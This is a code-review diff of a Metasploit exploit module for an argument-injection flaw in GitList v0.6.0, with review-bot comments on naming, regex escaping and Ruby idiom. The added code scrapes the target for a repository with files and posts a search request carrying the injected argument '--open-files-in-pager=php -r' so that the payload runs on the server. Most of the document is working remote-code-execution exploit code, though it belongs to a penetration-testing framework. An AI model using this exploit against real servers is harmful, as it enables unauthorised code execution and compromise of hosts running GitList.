diff --git a/modules/exploits/multi/http/gitlist_arg_injection.rb b/modules/exploits/multi/http/gitlist_arg_injection.rb
index 1792d8f371..77fc5b3d7c 100644
--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -35,13 +35,19 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'GitList v0.6.0', { } ]
         ],
       'Privileged' => false,
-      'Payload' => { 'BadChars' => '\'"' },
+      'Payload' => { 'BadChars' => '\'' },
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Default path to GitList', '/'])
+      ])
+
   end
 
   def check
-    uri = normalize_uri(target_uri.path, '/gitlist/')
+    uri = normalize_uri(target_uri.path)
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => uri
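Review bot: The TARGETURI description added in `register_options` reads as if '/' were a fallback value rather than what the option actually is, the base path under which GitList is served; `OptString.new('TARGETURI', [true, 'Base path of the GitList web root', '/'])` says that directly. The two blank lines framing `register_options` inside `initialize` are unusual for this file's layout and can go. The body of `check` continues outside the hunk, so the handling of `res` is not visible here.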
@@ -54,11 +60,42 @@ class MetasploitModule < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
+  def get_repo
+    repo_res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    if repo_res && repo_res.code == 200
+      repos = repo_res.body.scan(/\/([^\/]+)\/master\/rss\//).flatten
+      fail_with(Failure::Unreachable, "Could not retrieve any repos") if repos.empty?
+      return repos.detect{ |r| r if has_files?(r) }
+    else
+      fail_with(Failure::Unreachable, "Could not access GitList")
+    end
+  end
+
+  def has_files?(repo)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, repo, '/')
+    )
+    if res && res.code == 200
+      print_good("Successfully accessed repo #{repo}")
+      return false if res.body.scan(/#{repo}\/blob\/master\//).flatten.empty?
+
+      return true
+    else
+      fail_with(Failure::Unreachable, "Couldn't detect files in #{repo}'s repo")
+    end
+  end
+
   def exploit
-    postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-    cmd = '--open-files-in-pager=php -r "eval(\\"'
-    cmd << payload.encoded
-    cmd << '\\");"'
+    repo = get_repo
+    fail_with(Failure::Unreachable, "No files found in repos") if repo.nil?
+
+    postUri = normalize_uri(target_uri.path, repo << '/tree/c/search')
+    cmd = "--open-files-in-pager=php -r '#{payload.encoded}'"
     send_request_cgi(
       'method' => 'POST',
       'uri' => postUri,
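Review bot: In `has_files?` the repository name scraped from the server response is interpolated into a regex unescaped, `/#{repo}\/blob\/master\//`, so a name containing a metacharacter such as `.` or `+` either mismatches or raises RegexpError (e.g. an unbalanced `(`); it should be `Regexp.escape(repo)`, and `match?` is enough there since the capture is discarded. In `exploit`, `repo << '/tree/c/search'` mutates the string returned by `get_repo` only to pass it on; `normalize_uri(target_uri.path, repo, 'tree/c/search')` avoids both the mutation and the ad-hoc path join. `repos.detect{ |r| r if has_files?(r) }` is the idiom `repos.find { |r| has_files?(r) }`, and since `fail_with` raises, the `else` arms in both new methods can become guard clauses, which would also let `get_repo` drop its `get_` prefix (`find_repo`) per the Ruby style guide. The `send_request_cgi` call in `exploit` continues outside the hunk.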